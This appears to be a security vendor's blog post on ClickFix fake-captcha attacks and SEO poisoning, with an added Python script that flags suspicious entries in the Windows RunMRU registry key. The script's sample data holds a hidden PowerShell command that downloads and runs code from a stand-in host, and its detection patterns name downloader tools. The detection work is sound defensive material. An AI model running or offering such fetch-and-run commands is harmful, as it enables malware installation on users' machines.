51社区

Threat Actors' New "Fix," So Easy It's Addictive

A Look at the ClickFix Attack and SEO Poisoning

Attackers have so many tools available to them. Over the years, we've seen malicious PDFs, Business-Email-Chain phishing, Browser-in-Browser attacks, and many more, all pointing to some level of sophistication for bypassing the defenses that we as IT and IT security try to put into place. Then comes the latest attack that's sweeping the internet: the ClickFix attack.

This attack preys on the ever-changing nature of the security landscape. With its two-factor authentication, SSO, passkeys and captchas, there's no end to the number of ways we've made you verify your identity. So, what's one more way? If you're asked to paste into a window that opens up after pressing "Windows key + R", it must just be another step in the never-ending verification process showing that you are, in fact, human.

The simplicity of this attack would make you assume that it wouldn't be very effective. But from what 51社区's security operations team has seen, this is far from the truth. Let's go through the actual ClickFix attack chain.

ClickFix Attack Chain

ClickFix tends to prey on end-users wanting to find free resources online. For our education folks, think of a teacher looking for a free workpaper for students. The end-user types "free science homework assignment" into Google, and they click on the first thing that pops up at the top. Sometimes the results are paid ads, and other times the attacker is leveraging SEO (search engine optimization) to get their malicious site and/or file in front of the victim. This form of propagation is called SEO poisoning.

The attacker is crafting their website and files in such a way that the search engine displays their malicious content at or near the top of the search results. Once the end user has clicked on the malicious webpage, as sometimes happens when first visiting a new site, they are met with the normal-looking "Verify you are a human" captcha. They click the check mark, verifying they are human. They are then shown a second window requiring them to prove it further, but unlike normal captchas, ClickFix does not ask you to type out a phrase or identify all the images of a "crosswalk." Instead, it requires the end user to press "Windows key + R," then "Ctrl + V," and finally, "Enter."

What has just happened is that the unsuspecting end-user has run malicious code within the Windows Run utility, code that was secretly copied to their clipboard when they opened the malicious website. This malicious code often leads to the download and execution of malware. As mentioned previously, this attack is extremely simplistic, but simplistic within the cybersecurity world often does not mean ineffective. In the case of ClickFix, this is especially true.
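Because the pasted command goes through the Windows Run dialog, Windows records it in the per-user RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, where MRUList gives the most-recent-first order and each value ends in "\1"). The following triage script is an added example, not code from the original post or from 51社区: it parses a `reg export` of that key and flags entries that look like a ClickFix paste (remote URL, script host, hidden window or piped execution). The sample export and the flagging heuristics are constructed assumptions for illustration.

```python
import re

# Constructed sample: `reg export` output of the RunMRU key. Slot "c" is a
# made-up ClickFix-style paste; "a" and "b" are ordinary Run-dialog entries.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"MRUList"="cba"
"b"="calc\\1"
"c"="powershell -NoProfile -w hidden -c \"iwr https://example.invalid/fix | iex\"\\1"
'''

# Assumed heuristics: each pattern is paired with the reason reported to the analyst.
SUSPICIOUS = [
    (re.compile(r"https?://", re.I), "remote URL"),
    (re.compile(r"\b(powershell|pwsh|mshta|cmd|curl|certutil|bitsadmin)\b", re.I),
     "script host / downloader"),
    (re.compile(r"-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|\biex\b|\|", re.I),
     "hidden or piped execution"),
]

def parse_runmru(reg_text):
    """Return RunMRU entries as (slot, command) tuples, most recent first."""
    values = {}
    # .reg string values: "name"="value" with \\ and \" escapes inside the value.
    for m in re.finditer(r'^"([^"]+)"="((?:[^"\\]|\\.)*)"$', reg_text, re.M):
        name, raw = m.group(1), m.group(2)
        value = re.sub(r"\\(.)", r"\1", raw)          # undo .reg escaping
        if value.endswith("\\1"):                      # RunMRU appends a literal \1
            value = value[:-2]
        values[name] = value
    order = values.pop("MRUList", "")                  # e.g. "cba" = c newest, a oldest
    return [(slot, values[slot]) for slot in order if slot in values]

def triage(entries):
    """Flag entries matching any SUSPICIOUS pattern, keeping the matched reasons."""
    findings = []
    for slot, cmd in entries:
        reasons = [label for rx, label in SUSPICIOUS if rx.search(cmd)]
        if reasons:
            findings.append({"slot": slot, "command": cmd, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for hit in triage(parse_runmru(SAMPLE_REG)):
        print(f"[{hit['slot']}] {hit['command']}\n    reasons: {', '.join(hit['reasons'])}")
```

On a real host, run `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" runmru.reg` and feed the file contents to `parse_runmru`; flagged entries are a reason to pull the clipboard-seeding site from proxy logs and the child processes of explorer.exe from endpoint telemetry.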

What are some things that you can do to prevent this attack?

If you are a 51社区 XDR customer, we detect and stop these attacks no matter the time, before they get bad, often without even needing to involve the IT teams. If you are interested in seeing how 51社区 can partner with you, feel free to contact us!